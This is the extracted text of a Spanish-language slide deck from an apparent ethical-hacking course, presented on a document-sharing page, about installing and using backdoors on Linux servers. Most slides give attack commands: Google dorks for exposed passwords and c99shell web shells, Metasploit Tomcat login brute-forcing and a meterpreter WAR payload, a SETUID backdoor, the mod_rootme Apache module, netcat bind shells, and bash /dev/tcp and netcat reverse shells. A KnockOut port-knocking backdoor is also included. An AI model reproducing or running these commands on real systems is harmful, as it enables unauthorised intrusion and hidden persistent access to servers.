Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors

Tamaño: px

Comenzar la demostración a partir de la página:

Download "Backdoors en Sistemas Operativos. Instalación, configuración y uso de Backdoors"

Francisco Javier Ojeda Cortés
hace 7 años
Vistas:

1 Backdoors en Sistemas Operativos Instalación, configuración y uso de Backdoors

2 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades backdoors 4. Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 5. Instalando y configurando backdoors (ejemplos) 6. Información sobre el curso 7. Conclusiones

3 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades 4. Qué es un backdoor? 5. Instalando y configurando backdoors (ejemplos) 6. Conclusiones

4 #whoami Ing. Sistemas ISO Lead Auditor, CISM, C EH, C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO Instructor Oficial de MILE2 Consultor de Kunak Consulting SAC Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: Correo electrónico: omarc320@gmail.com opalomino@kunak.com.pe Cuenta de Facebook:

5 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Buscando vulnerabilidades 4. Qué es un backdoor? 5. Instalando y configurando backdoors (ejemplos) 6. Conclusiones

6 Quiénes nos amenazan?

7 Y esto. en realidad pasa?

8 Y esto. en realidad pasa?

9 Colaboradores Internos 90% Hackers Independientes 68% Contratistas o proveedores 66% Hacktivistas 54% Fuente E&Y Encuesta Global de Seguridad de Inf. 2014

10 DEMANDA y OFERTA de Hacking en el Perú

11 Una fuerte OFERTA

12 Una fuerte OFERTA

13 Y una más fuerte DEMANDA

14 Y una más fuerte DEMANDA

15 Y una más fuerte DEMANDA

16 Y una más fuerte DEMANDA

17 Y una más fuerte DEMANDA

18 Y una más fuerte DEMANDA

19 Google Dorks para buscar daterange: "Password=" inurl:web.config -intext:web.config ext:config intitle:!c99shell v. 1.0 site:.pe filetype:php intext:"!c99shell v. 1.0 beta Las personas siempre son los mejores backdoors

20 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Conclusiones

21 Qué es un Backdoor (puerta trasera)? Los backdoors son programas utilizados por los hackers para lograr acceso a sistemas operativos de manera rápida y sencilla. Existen diferentes tipos de backdoors: Backdoors en Aplicaciones Web Backdoors a través de SETUID Backdoors en Módulos de Servicios Backdoors del tipo Knocking

22 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Conclusiones

backdoors - Sistema Operativo Linux Dirección IP: 192.168.4.131 Dirección IP: 192.168.4.130 Dirección IP: 192.

23 Arquitectura de los Ejemplos ATACANTE - Computador desde el cual se realizarán los ataques - Sistema Operativo KALI LINUX 2 TARGET - Servidor TOMCAT vulnerable - Aquí se instalaran los backdoors - Sistema Operativo Linux Dirección IP: Dirección IP: Dirección IP: ATACANTE 2 - Computador desde el cual se explotaran los backdoors - Sistema Operativo Linux

24 Identificar Servicios TOMCAT Buscamos TOMCAT en la RED LAN a través de NMAP Nmap sv p 8080 ss TARGET auxiliary/scanner/portscan/syn Buscamos TOMCAT/AXIS2 en INTERNET: Google Dork: intitle:"tomcat Server Administration intitle:"axis2 Happiness Page" +ext:jsp

25 Ahora si. Vamos con los ejemplos

26 Identificar Vulnerabilidades en TOMCAT Vamos a utilizar vulnerabilidades: METASPLOIT para identificar Root> msfconsole Root> search tomcat Root> use auxiliary/scanner/http/tomcat_mgr_login Root> show options Root> set RHOSTS Finalmente realizar la carga de un.war malicioso para obtener accesoal sistema operativo. msfvenom -p java/meterpreter/reverse_tcp LHOST= f war > meterpreter.war En el cliente: Msf> use exploit/multi/handler Msf> set payload java/meterpreter/reverse_tcp

El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario.

27 Backdoor con SETUID De pronto algunos nunca escucharon de los permisos GETUID, SETUID y STICKY. Pues este mecanismo de backdoor está asociado a SETUID. Entonces en que consiste el SETUID? El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario. El concepto puede sonar muy abstracto pero si ponemos un ejemplo es más facil entender, vamos a crear un archivo llamado TEST.C y lo compilamos.

28 Backdoor con SETUID

29 Backdoor en Apache Server Cargamos un módulo en APACHE de tal manera que no se realicen cambios a nivel de código en los aplicativos PHP. Cuántos administradores de Sistemas verifican los módulos cargados en Apache? Toca compilar un módulo de APACHE llamado ModROOTme. otkit/tree/master/mod_rootme-0.4

30 Backdoor en Apache Server Comandos en el Sistema Operativo root>cd mod_rootme-0.4/ root>make Linux root> cp mod_rootme2.so /etc/httpd/modules root> /etc/init.d/httpd reload En el cliente: Root> nc GET root

31 Backdoor: BindShell Las primeras herramientas utilizados por Hackers fue la navaja suiza NETCAT. Una BindShell es un programa corriendo una SHELL dentro de un proceso de red. Una BindShell puede estar escrita en cualquier lenguaje de programación. php

32 Backdoor: Bind Shell Comandos en el sistema operativo: root>./configure --enable-dgaping_security_hole root>make root> cd src/ root>./netcat -l -p e /bin/sh root> bg En el CLIENTE: C:\>nc64.exe

33 Backdoor: Reverse Shell Tiene el mismo concepto que una Bind Shell pero realizada de manera reversa. Ahora es el servidor quien se conecta a nuestro cliente. Esta pensado para poder realizar bypass de Firewalls.

34 Backdoor: Reverse Shell Reverse Shell con BASH En el cliente: nc64.exe -l -p vvv En el servidor: bash -i >& /dev/tcp/ /8080 0>&1

35 Backdoor: Reverse Shell Reverse Shell con NETCAT En el cliente: nc64.exe -l -p vvv En el servidor:./netcat -e /bin/sh

36 Backdoor: KnockOut Knock viene del ingles tocar la puerta. Este es un backdoor del tipo Reverse Shell que pasa desapercibido. Sólo puede ser accedido por aquel que conozca la combinación de la puerta correcta.

37 Backdoor: KnockOut En el servidor: Root> $make servidor Root>./knock-outd knock-out.conf eth5 En el cliente (atacante): Root> $make cliente Root>./knock-outc knock-out.conf Root>./netcat -lv -p 64876

38 AGENDA 1. Quién soy? 2. Casos de Seguridad Informática en el Perú y el mundo 3. Qué es un backdoor? 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones

39 Conclusiones: - Instalar backdoors es la manera mas sencilla de acceder a servidor comprometidos. - Cuando un servidor Linux es comprometido se recomienda reestablecer un backup ya que detectar backdoors o rootkits es muy complicado.

40 PREGUNTAS?

Documentos relacionados

CURSO DE ETHICAL HACKING

1. OBJETIVOS DEL CURSO 1.1. OBJETIVO GENERAL CURSO DE ETHICAL HACKING Brindar a los participantes los conocimientos, técnicas y habilidades utilizadas por hackers para realizar ataques informáticos. 1.2.